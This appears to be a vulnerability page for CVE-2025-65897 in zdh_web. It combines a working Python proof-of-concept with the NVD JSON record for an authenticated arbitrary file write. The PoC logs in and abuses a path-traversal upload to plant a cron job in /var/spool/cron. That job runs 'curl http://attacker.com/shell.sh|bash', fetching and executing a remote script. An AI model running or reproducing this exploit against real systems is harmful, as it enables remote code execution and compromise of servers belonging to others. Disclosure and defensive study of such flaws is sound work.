CVE-2025-65897

import requests import sys # CVE-2025-65897 PoC - zdh_web Arbitrary File Write # Target: zdh_web < 5.6.18 TARGET_URL = "http://target:8080" USERNAME = "attacker" PASSWORD = "password" def login(): """Authenticate and get session cookie""" session = requests.Session() login_url = f"{TARGET_URL}/login" data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, data=data, timeout=10) return session if response.status_code == 200 else None def exploit(session): """Exploit arbitrary file write via path traversal""" upload_url = f"{TARGET_URL}/file/upload" # Path traversal payload to write to arbitrary location malicious_content = "#!/bin/bash\n# Malicious cron job\ncurl http://attacker.com/shell.sh|bash" files = { 'file': ('test.txt', malicious_content, 'text/plain') } # Inject path traversal in the upload path parameter data = { 'path': '../../../var/spool/cron/' } response = session.post(upload_url, files=files, data=data, timeout=10) return response.status_code == 200 if __name__ == "__main__": print(f"[*] Exploiting CVE-2025-65897 on {TARGET_URL}") session = login() if session and exploit(session): print("[+] File write successful - RCE achieved") else: print("[-] Exploitation failed")

{"cve": {"id": "CVE-2025-65897", "sourceIdentifier": "[email protected]", "published": "2025-12-05T16:15:50.913", "lastModified": "2025-12-12T12:52:30.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "zdh_web is a data collection, processing, monitoring, scheduling, and management platform. In zdh_web thru 5.6.17, insufficient validation of file upload paths in the application allows an authenticated user to write arbitrary files to the server file system, potentially overwriting existing files and leading to privilege escalation or remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zhaoyachao:zdh_web:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.6.17", "matchCriteriaId": "B1C57E92-1507-4906-807A-8341427AAAE9"}]}]}], "references": [{"url": "https://github.com/zhaoyachao/zdh_web", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/zhaoyachao/zdh_web/commit/b2423378a8bf83f159f19ce4e14eac71c939793a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zhaoyachao/zdh_web/issues/40", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/zhaoyachao/zdh_web/pull/39", "source": "[email protected]", "tags": ["Patch"]}]}}